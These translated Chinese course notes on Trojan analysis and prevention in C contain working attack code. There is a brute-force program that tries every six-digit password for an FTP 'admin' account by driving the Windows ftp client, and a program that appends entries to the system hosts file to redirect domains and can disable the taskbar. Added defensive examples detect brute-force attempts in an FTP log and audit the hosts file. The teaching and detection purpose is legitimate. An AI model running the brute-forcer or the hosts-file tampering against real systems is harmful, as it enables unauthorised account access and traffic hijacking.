C/C++ Open Course Study Notes - Hacker code analysis and prevention, and wisdom podcast Study Notes

Source: Internet
Author: User


Hacker code Analysis and Prevention notes


[Course Introduction]

Apart from assembly, C/C++ is the language closest to the underlying machine. Mainstream operating systems such as Windows, Linux, iOS, and Android are all written in C/C++, and for the same reason many viruses and Trojans are implemented in C/C++. The purpose of the course is to explain, in C, how Trojans and various remote control programs work and how to protect against them.

[Course knowledge points]

1. Trojan intrusion into the system;

2. Analysis of key behaviors after Trojans intrude into the host target;

3. Trusted port and port scanning technology;

4. Remote control implementation code;

5. Use TCP, UDP, and firewall traversal technologies in malicious code;

6. 360 Network Security Protection implementation principle.

    #include <stdio.h>
    #include <string.h>

    // Script fed to the Windows ftp client: open <ip>, then answer the
    // "user" prompts with the user name and the password, then quit.
    #define CONTENT "open %s\nuser\n%s\n%s\nbye\n"

    int write_file(const char *ip, const char *user, const char *passwd)
    {
        FILE *p = fopen("a.txt", "w");
        if (p)
        {
            char buf[1024] = { 0 };
            sprintf(buf, CONTENT, ip, user, passwd);
            fputs(buf, p);
            fclose(p);
            return 0; // success: return 0
        }
        return -1; // failure: return -1
    }

    int main()
    {
        int i;
        for (i = 0; i < 1000000; i++) // assume that all passwords are composed of digits
        {
            char pass[100] = { 0 };
            sprintf(pass, "%06d", i); // format the number as a string
            if (write_file("192.168.101.138", "admin", pass) == 0)
            {
                FILE *p = _popen("ftp -n -s:a.txt", "r");
                char buf[1024] = { 0 };
                if (!p)
                    return -1;
                while (fgets(buf, sizeof(buf), p))
                {
                    if (strncmp(buf, "230", 3) == 0) // reply code 230 indicates a successful login
                    {
                        printf("pass: %s\n", pass);
                        _pclose(p);
                        return 0;
                    }
                }
                _pclose(p);
            }
        }
        return 0;
    }
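The loop above leaves a clear trace on the server side: one client collecting a long run of 530 (login rejected) replies, possibly ending in a 230. The following is an added example, not part of the original notes, that tallies reply codes per client and flags that pattern; the one-pair-per-line log layout, the sample addresses and the names `tally` and `verdict` are assumptions made for the illustration.

```c
#include <stdio.h>
#include <string.h>

#define MAX_CLIENTS 32

struct client { char ip[46]; int failures; int fails_before_ok; };

/* Constructed sample: one "<client> <FTP reply code>" pair per line (assumed layout). */
static const char SAMPLE_LOG[] =
    "10.0.0.7 530\n10.0.0.7 530\n10.0.0.9 530\n10.0.0.7 530\n10.0.0.9 230\n"
    "10.0.0.7 530\n10.0.0.7 530\n10.0.0.7 230\n10.0.0.12 530\n10.0.0.12 530\n"
    "10.0.0.12 530\n10.0.0.12 530\n10.0.0.12 530\n10.0.0.12 530\n";

/* Fill tab with per-client counters; returns the number of distinct clients. */
int tally(const char *log, struct client *tab, int max)
{
    int n = 0;
    while (*log) {
        char line[128], ip[46];
        int code, i;
        size_t len = strcspn(log, "\n");
        snprintf(line, sizeof line, "%.*s", (int)len, log);
        if (sscanf(line, "%45s %d", ip, &code) == 2) {
            for (i = 0; i < n && strcmp(tab[i].ip, ip) != 0; i++)
                ;
            if (i == n && n < max) {            /* first line from this client */
                strcpy(tab[n].ip, ip);
                tab[n].failures = 0;
                tab[n].fails_before_ok = -1;    /* -1: no successful login yet */
                n++;
            }
            if (i < n && code == 530)           /* 530: login rejected */
                tab[i].failures++;
            else if (i < n && code == 230 && tab[i].fails_before_ok < 0)
                tab[i].fails_before_ok = tab[i].failures;
        }
        log += len + (log[len] == '\n');
    }
    return n;
}

/* 0 = normal, 1 = guessing in progress, 2 = login succeeded after a guessing run. */
int verdict(const struct client *c, int threshold)
{
    return c->fails_before_ok >= threshold ? 2 : c->failures >= threshold;
}
```

A verdict of 2 means the account's password should be treated as known to the client; a server-side lockout or delay after a few 530 replies keeps a guessing run from ever reaching that state.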


Function:

    // Lockmask.cpp: defines the entry point of the application.
    //

    #include "stdafx.h"
    #include "lockmask.h"

    // function
    /*
    Modify the application icon
    VS: replace the <project name>.ico file.
    QT:
      a. find an .ico image and rename it to myapp.ico
      b. create a text document myapp.rc and add: IDI_ICON1 ICON DISCARDABLE "myapp.ico"
      c. in the myapp.pro file add: RC_FILE = myapp.rc
         After rebuilding, the modification takes effect.
    */

    /*
    Building with VS2013 so that the program does not depend on the runtime
    library and is compatible with XP:
    Project -- Properties -- Configuration Properties -- General -- Platform Toolset -- Windows XP
    Project -- Properties -- Configuration Properties -- C/C++ -- Code Generation -- Runtime Library -- Multithreading (/MT)
    */

    #include <stdio.h>
    #include <string.h>
    #include <Windows.h>
    #include <ShellAPI.h>

    #pragma warning(disable: 4996)

    void getWinVersion() // get the Windows version
    {
        OSVERSIONINFO a;
        a.dwOSVersionInfoSize = sizeof(a);
        GetVersionEx(&a);
    }

    int setHosts(const char *IP, const char *domain) // modify the hosts file
    {
        char s[MAX_PATH] = { 0 };
        GetSystemDirectoryA(s, sizeof(s)); // obtain the Windows system directory
        char path[MAX_PATH + 32] = { 0 };
        sprintf(path, "%s\\%s", s, "drivers\\etc\\hosts");
        char content[1024] = { 0 };
        sprintf(content, "%s %s\n", IP, domain); // one hosts entry: IP, whitespace, host name
        FILE *p = fopen(path, "a"); // open the hosts file for appending
        if (p)
        {
            fputs(content, p);
            fclose(p);
            return 0;
        }
        return -1;
    }

    HWND getTask() // obtain the taskbar handle
    {
        typedef HWND (WINAPI *PROCGETTASKMANWND)(void); // function-pointer type for HWND func(void)
        PROCGETTASKMANWND GetTaskmanWindow; // define the function-pointer variable
        HMODULE hUser32 = GetModuleHandleA("user32"); // reference the user32.dll library
        if (!hUser32)
            return NULL;
        GetTaskmanWindow = (PROCGETTASKMANWND)GetProcAddress(hUser32, "GetTaskmanWindow");
        if (!GetTaskmanWindow)
            return NULL;
        HWND h = GetTaskmanWindow();
        return GetParent(h);
    }

    int APIENTRY _tWinMain(_In_ HINSTANCE hInstance,
                           _In_opt_ HINSTANCE hPrevInstance,
                           _In_ LPTSTR lpCmdLine,
                           _In_ int nCmdShow)
    {
        HWND h = getTask();
        // EnableWindow(h, false); // set the taskbar to disabled
        EnableWindow(h, true); // set the taskbar to available
        return 0;
    }
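An entry appended by `setHosts` overrides DNS for that name, so a host check worth running is to list every name the hosts file maps to a non-local address. The following is an added example, not part of the original notes; `audit_hosts`, the sample content and the `example.test` names are assumptions, and 0.0.0.0 is treated as a local sinkhole address.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample hosts content; names and 203.0.113.5 are placeholders. */
static const char SAMPLE_HOSTS[] =
    "# sample header comment\n"
    "127.0.0.1       localhost\n"
    "::1             localhost\n"
    "0.0.0.0         ads.example.test   # local sinkhole\n"
    "\n"
    "203.0.113.5 update.example.test www.example.test\n";

/* Loopback and the 0.0.0.0 sinkhole are expected in a hosts file. */
static int is_local(const char *ip)
{
    return strncmp(ip, "127.", 4) == 0 || strcmp(ip, "::1") == 0 ||
           strcmp(ip, "0.0.0.0") == 0;
}

/* Count host names mapped to a non-local address; when cb is not NULL it is
   called as cb(ip, name) for each such mapping. */
int audit_hosts(const char *text, void (*cb)(const char *, const char *))
{
    int hits = 0;
    while (*text) {
        char line[256];
        size_t len = strcspn(text, "\n");
        snprintf(line, sizeof line, "%.*s", (int)len, text);
        line[strcspn(line, "#")] = '\0';            /* drop a trailing comment */
        char *ip = strtok(line, " \t\r");           /* first field: the address */
        if (ip && !is_local(ip))
            for (char *name; (name = strtok(NULL, " \t\r")) != NULL; hits++)
                if (cb) cb(ip, name);
        text += len + (text[len] == '\n');
    }
    return hits;
}

static void report(const char *ip, const char *name)
{
    printf("%s is pinned to %s\n", name, ip);
}

int main(void)
{
    printf("%d override(s) found\n", audit_hosts(SAMPLE_HOSTS, report));
    return 0;
}
```

Legitimate overrides exist, so the output is best compared against a known-good copy of the file; the write itself needs administrator rights, which makes changes to this path a useful file-integrity monitoring target.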


